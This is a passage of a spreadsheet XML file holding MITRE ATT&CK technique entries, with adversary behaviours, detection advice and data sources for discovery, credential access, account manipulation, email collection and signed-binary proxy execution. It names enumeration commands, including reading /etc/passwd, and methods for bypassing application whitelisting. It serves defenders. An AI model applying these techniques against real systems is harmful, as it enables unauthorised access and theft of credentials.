  </si>
  <si>
    <t>Process whitelisting,Data Execution Prevention,Exploit Prevention</t>
  </si>
  <si>
    <t>Log analysis,Host intrusion prevention systems,Anti-virus</t>
  </si>
  <si>
    <t>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings. 
### Windows
Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility.
### Mac
On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.
### Linux
On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.
### Office 365 and Azure AD
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
Adversaries may gain access to and use third-party systems installed within an enterprise network, such as administration, monitoring, and deployment systems as well as third-party gateways and jump servers used for managing other systems. Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,SaaS,Office 365</t>
  </si>
  <si>
    <t xml:space="preserve">Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. </t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. 
Accounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.
Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.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Default accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)
The overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>Firewall,Host intrusion prevention systems,Network intrusion detection system,Process whitelisting,System access controls,Anti-virus</t>
  </si>
  <si>
    <t>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A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158).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(Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local file systems and remote file shares for files containing passwords.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[Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</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</si>
  <si>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
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>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 Windows
Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, [Systeminfo](https://attack.mitre.org/software/S0096), and &lt;code&gt;dir&lt;/code&gt; within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.
### Mac
On Mac, the &lt;code&gt;systemsetup&lt;/code&gt; command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the &lt;code&gt;system_profiler&lt;/code&gt; gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.
### AWS
In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual machines, software, and software dependencies running.(Citation: Amazon System Discovery)
### GCP
On Google Cloud Platform (GCP) &lt;code&gt;GET /v1beta1/{parent=organizations/*}/assets&lt;/code&gt; or &lt;code&gt;POST /v1beta1/{parent=organizations/*}/assets:runDiscovery&lt;/code&gt; may be used to list an organizations cloud assets, or perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard)
### Azure
In Azure, the API request &lt;code&gt;GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01&lt;/code&gt; may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal Machine API)</t>
  </si>
  <si>
    <t>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
Monitor proceExesses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</si>
  <si>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may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
### Windows
Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.
### Mac and Linux
In Mac and Linux, this kind of discovery is accomplished with the &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt; commands.</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</t>
  </si>
  <si>
    <t>Anti-virus,Application whitelisting,Digital Certificate Validation</t>
  </si>
  <si>
    <t>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. 
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts. 
### Windows
Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.
### Mac
On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.
### Linux
On Linux, local users can be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file which is world readable. In mac, this same file is only used in single-user mode in addition to the &lt;code&gt;/etc/master.passwd&lt;/code&gt; file.
Also, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands.
### Office 365 and Azure AD
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>File monitoring,Host intrusion prevention systems,Signature-based detection,Log analysis,Anti-virus</t>
  </si>
  <si>
    <t>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to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the internet and then the proxy would forward communications to the C2 server.
Internal connection proxies can be used to consolidate internal connections from compromised systems. Adversaries may use a compromised internal system as a proxy in order to conceal the true destination of C2 traffic. The proxy can redirect traffic from compromised systems inside the network to an external C2 server making discovery of malicious traffic difficult. Additionally, the network can be used to relay information from one system to another in order to avoid broadcasting traffic to all systems.</t>
  </si>
  <si>
    <t>Log Analysis,Firewall</t>
  </si>
  <si>
    <t>Process whitelisting,Whitelisting by file name or path,Signature-based detection,Anti-virus</t>
  </si>
  <si>
    <t>Signature-based detection,Host forensic analysis,Anti-virus</t>
  </si>
  <si>
    <t>Windows,Office 365,Azure,GCP,Azure AD,AWS</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738.(Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger volume of emails sent from an account than normal and the discovery of similar phishing emails being sent from real accounts within a network may be signs that an account may have been compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
### Exchange Email Account Takeover
The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
### Azure AD
In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death)
### AWS
AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)</t>
  </si>
  <si>
    <t>Host forensic analysis</t>
  </si>
  <si>
    <t>Binary Analysis,Log analysis,Firewall</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,Office 365,SaaS,Azure AD</t>
  </si>
  <si>
    <t>Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. 
If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>Network intrusion detection system,Anti-virus</t>
  </si>
  <si>
    <t>File monitoring,Host intrusion prevention systems,Anti-virus</t>
  </si>
  <si>
    <t>Office 365 account logs,Authentication logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD,SaaS</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
For password spraying consider the following(Citation: Trimarc Detecting Password Spraying):
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying.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
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</t>
  </si>
  <si>
    <t>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(see examples).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establish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[Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.</t>
  </si>
  <si>
    <t>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Windows,Office 365</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files.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
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific key words.(Citation: Black Hills MailSniper, 2017)
### Email Forwarding Rule
Adversaries may also abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: TIMMCMIC, 2014)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. </t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
Regsvr32.exe can also be used to specifically bypass process whitelisting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 (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Process whitelisting,Anti-virus,Digital Certificate Validation</t>
  </si>
  <si>
    <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;. InstallUtil.exe is digitally signed by Microsoft.
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>Process whitelisting,Digital Certificate Validation</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
  </si>
  <si>
    <t>Autoruns Analysis</t>
  </si>
  <si>
    <t>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
### MSBuild
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild) 
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: LOLBAS Msbuild)
### DNX
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft. 
An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)
### RCSI
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)
### WinDbg/CDB
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
### Tracker
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: LOLBAS Tracker)</t>
  </si>
  <si>
    <t>The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
